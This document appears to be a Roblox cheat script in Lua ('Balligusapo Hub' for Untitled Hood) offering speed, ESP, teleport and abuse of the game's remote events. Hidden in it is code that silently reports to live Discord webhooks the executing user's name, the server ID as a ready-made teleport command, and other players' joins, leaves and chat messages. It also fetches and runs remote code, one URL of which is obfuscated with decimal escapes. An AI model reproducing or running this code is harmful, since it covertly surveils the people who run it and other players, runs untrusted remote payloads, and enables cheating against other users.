

local msg = "Untitled Hood Gui Logs " .. game.Players.LocalPlayer.Name .. " just executed ur script"
local url = "https://discord.com/api/webhooks/986982544610320476/TrUncT9_OQWdgJtv-jNzukjcdyJZuHgmjn6_kEdUjhYVemi3ckgjM5NDbHA9h8LhmGIu"

syn.request({Url = url, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game:GetService("HttpService"):JSONEncode({["content"]=msg})})




local msg = ('game:GetService("TeleportService"):TeleportToPlaceInstance(9183932460,"') .. game.JobId .. '")'
local url = "https://discord.com/api/webhooks/986982544610320476/TrUncT9_OQWdgJtv-jNzukjcdyJZuHgmjn6_kEdUjhYVemi3ckgjM5NDbHA9h8LhmGIu"

syn.request({Url = url, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game:GetService("HttpService"):JSONEncode({["content"]=msg})})

local msg = "" .. game.PlaceId
local url = "https://discord.com/api/webhooks/986982544610320476/TrUncT9_OQWdgJtv-jNzukjcdyJZuHgmjn6_kEdUjhYVemi3ckgjM5NDbHA9h8LhmGIu"

syn.request({Url = url, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game:GetService("HttpService"):JSONEncode({["content"]=msg})})


loadstring(game:HttpGet("https://raw.githubusercontent.com/BalligusapoTT/BalligusapoTT/main/EJGAMINGGGXXXDYT"))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/BalligusapoTT/BalligusapoTT/main/Gosubnowpls1"))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/BalligusapoTT/BalligusapoTT/main/Lfunky1"))()


local Library = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()
local Window = Library.CreateLib("Balligusapo Hub", "BloodTheme")

local Tab = Window:NewTab("Scripts")
local Section = Tab:NewSection("Scripts")
Section:NewTextBox("Speed", "TextboxInfo", function(txt)
game.Players.LocalPlayer.Character.Humanoid.Name = "BuyLinoriaNow"
game.Players.LocalPlayer.Character.BuyLinoriaNow.WalkSpeed = (txt)
end)
Section:NewTextBox("DropCash", "TextboxInfo", function(txt)
-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = "DropMoney",
    [2] = (txt)
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
end)
Section:NewButton("AutoToxic", "ButtonInfo", function()

-- BlastingStone#8878

local function chat(msg)
   game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(msg, "All")
end

local Randomize = math.random(1, 4)
local Throwdown = math.random(1, 25)

local Mode = 1 -- 0: Dialogue Start | 1: Dialogue | 2: Always throwdown

local function BenDialogue()
   if Throwdown == 1 then
       ThrowdownDialogue()
   elseif Randomize == 1 then
       chat("ez clown")
   elseif Randomize == 2 then
       chat("dog aim kiddo")
   elseif Randomize == 3 then
       chat("ez bozo")
   elseif Randomize == 4 then
       chat("learn some aiming kid")
   end
end

local function BenDialogueStart()
   chat("*ringring*")
   task.wait(2)
   chat("*picks up the phone*")
   task.wait(0.7)
   chat("ben")
end

if Mode == 0 then
   BenDialogueStart()
elseif Mode == 1 then
   BenDialogue()
elseif Mode == 2 then
   ThrowdownDialogue()
else
   warn("Wrong mode! || Ben Script by BlastingStone#8878")
end
end)
Section:NewTextBox("PlayMusic", "TextboxInfo", function(txt)
	local args = {
    [1] = "Boombox",
    [2] = (txt)
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
end)
Section:NewButton("Stop Boombox", "ButtonInfo", function()
-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = "BoomboxStop"
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
end)
Section:NewButton("Rejoin", "ButtonInfo", function()
game:GetService("TeleportService"):Teleport(game.PlaceId, game:GetService("Players").LocalPlayer)
end)
Section:NewTextBox("SpamCall (Equip Phone)", "TextboxInfo", function(txt)
while true do
wait(0)
-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = "PhoneCall",
    [2] = (txt)
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
end
end)
Section:NewButton("Esp Player", "ButtonInfo", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ic3w0lf22/Unnamed-ESP/master/UnnamedESP.lua"))()
end)
Section:NewButton("AutoJump", "ButtonInfo", function()
while true do wait()
game.Players.LocalPlayer.Character.Humanoid.Jump = true
end
end)
local Tab = Window:NewTab("Animation Gui")
local Section = Tab:NewSection("Untitled Hood Animation")
Section:NewButton("Untitled Hood Animation Gui", "ButtonInfo", function()
loadstring(game:HttpGet("https://pastebin.com/raw/dsALdf8R"))()
end)
local Tab = Window:NewTab("Fun Script")
local Section = Tab:NewSection("Key Needed (Join For Key: https://discord.gg/dFUC87m8YJ)")
Section:NewButton("Ben Tool Script", "ButtonInfo", function()
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\66\97\108\108\105\103\117\115\97\112\111\84\84\47\66\97\108\108\105\103\117\115\97\112\111\84\84\47\109\97\105\110\47\66\101\110\115\99\114\105\112\116\10"))()
end)
Section:NewButton("Teleport Tool With Sound", "ButtonInfo", function()
mouse = game.Players.LocalPlayer:GetMouse()
tool = Instance.new("Tool")
tool.RequiresHandle = false
tool.Name = "Teleport"
tool.Activated:connect(function()
local pos = mouse.Hit+Vector3.new(0,2.5,0)
pos = CFrame.new(pos.X,pos.Y,pos.Z)
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = "Boombox",
    [2] = "7549600066"
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
wait(1.9)
-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = "BoomboxStop"
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
end)
tool.Parent = game.Players.LocalPlayer.Backpack
end)

--=Script By Teedie=--

--=Start Settings=--
LogPlayerJoins = true --Set this to false if you don't want the script to log joins.
LogPlayerChat = true --Set this to false if you don't want the script to log chat.
LogPlayerLeaves = true --Set this to false if you don't want the script to log leaves.
DebugMode = false --All this does is enable the spammy printing for the script, I would recommend keeping it disabled.
Webhook = "https://discord.com/api/webhooks/986981271790030918/tUn6TsuiRL_oq6jHynMGUJi38povtN9C1dchVrL1tgRBniW2IKzFMpb1r0SjN9tBATUC" --Put your webhook here.
--End Settings=--

if Webhook == "" then error("Please enter your webhook.") end
if game.CoreGui:FindFirstChild("logginggge") then error("Logging already loaded!") end
ma = Instance.new("NumberValue", game.CoreGui)
ma.Name = "logginggge"
ms = ma.Value
ms = 1
random = game.JobId
GetName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
if DebugMode == false then function nothing() end print = nothing warn = nothing end

local a =
   game:GetService("HttpService"):JSONEncode(
   {
       ["content"] = tostring(game.Players.LocalPlayer.Name) .. " executed script, logging started.",
       ["avatar_url"] = "https://www.roblox.com/asset-thumbnail/image?assetId="..game.PlaceId.."&width=768&height=432&format=png",
       ["username"] = GetName.Name ..
           " | Place Version: " .. tostring(game.PlaceVersion) .. " (" .. tostring(random) .. ")"
   }
)
syn.request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = a})

game:GetService("Players").PlayerRemoving:Connect(
   function(player)
       if LogPlayerLeaves == true then
           if player.Name == game.Players.LocalPlayer.Name then
               local embed =
                   game:GetService("HttpService"):JSONEncode(
                   {
                       ["content"] = tostring(game.Players.LocalPlayer.Name) .. " left, logging ended.",
                       ["username"] = GetName.Name ..
                           " | Place Version: " .. tostring(game.PlaceVersion) .. " (" .. tostring(random) .. ")"
                   }
               )
               syn.request(
                   {
                       Url = Webhook,
                       Method = "POST",
                       Headers = {["Content-Type"] = "application/json"},
                       Body = embed
                   }
               )
           else
               if ms >= 30 then
                   print("reached max (leave)")
               else
                   ms = ms + 1
                   print(ms)
                   local embed =
                       game:GetService("HttpService"):JSONEncode(
                       {
                           ["content"] = tostring(player) .. " left.",
                           ["username"] = GetName.Name ..
                               " | Place Version: " .. tostring(game.PlaceVersion) .. " (" .. tostring(random) .. ")"
                       }
                   )
                   syn.request(
                       {
                           Url = Webhook,
                           Method = "POST",
                           Headers = {["Content-Type"] = "application/json"},
                           Body = embed
                       }
                   )
               end
           end
       end
   end
)

game:GetService("Players").PlayerAdded:Connect(
   function(player)
       if LogPlayerJoins == true then
           if ms >= 30 then
               print("reached max (join)")
           else
               ms = ms + 1
               print(ms)
               local embed =
                   game:GetService("HttpService"):JSONEncode(
                   {
                       ["content"] = tostring(player) .. " joined the game.",
                       ["username"] = GetName.Name ..
                           " | Place Version: " .. tostring(game.PlaceVersion) .. " (" .. tostring(random) .. ")"
                   }
               )
               syn.request(
                   {
                       Url = Webhook,
                       Method = "POST",
                       Headers = {["Content-Type"] = "application/json"},
                       Body = embed
                   }
               )
           end
       end
       player.Chatted:Connect(
           function(msg)
               if ms >= 30 then
                   print("reached max (chat)")
                   return
               else
                   if LogPlayerChat == true then
                       ms = ms + 1
                       print(ms)
                       local embed =
                           game:GetService("HttpService"):JSONEncode(
                           {
                               ["content"] = tostring(player) .. ": " .. tostring(msg),
                               ["username"] = GetName.Name ..
                                   " | Place Version: " ..
                                       tostring(game.PlaceVersion) .. " (" .. tostring(random) .. ")"
                           }
                       )
                       syn.request(
                           {
                               Url = Webhook,
                               Method = "POST",
                               Headers = {["Content-Type"] = "application/json"},
                               Body = embed
                           }
                       )
                   end
               end
           end
       )
   end
)

local children = game:GetService("Players"):GetChildren()
for i, child in ipairs(children) do
   child.Chatted:Connect(
       function(msg)
           if ms >= 30 then
               print("reached max (chat)")
               return
           else
               if LogPlayerChat == true then
                   ms = ms + 1
                   print(ms)
                   local embed =
                       game:GetService("HttpService"):JSONEncode(
                       {
                           ["content"] = tostring(child) .. ": " .. tostring(msg),
                           ["username"] = GetName.Name ..
                               " | Place Version: " .. tostring(game.PlaceVersion) .. " (" .. tostring(random) .. ")"
                       }
                   )
                   syn.request(
                       {
                           Url = Webhook,
                           Method = "POST",
                           Headers = {["Content-Type"] = "application/json"},
                           Body = embed
                       }
                   )
               end
           end
       end
   )
end

while wait(60) do
   print(ms)
   ms = 1
   print("reset webhook timer thing")
end
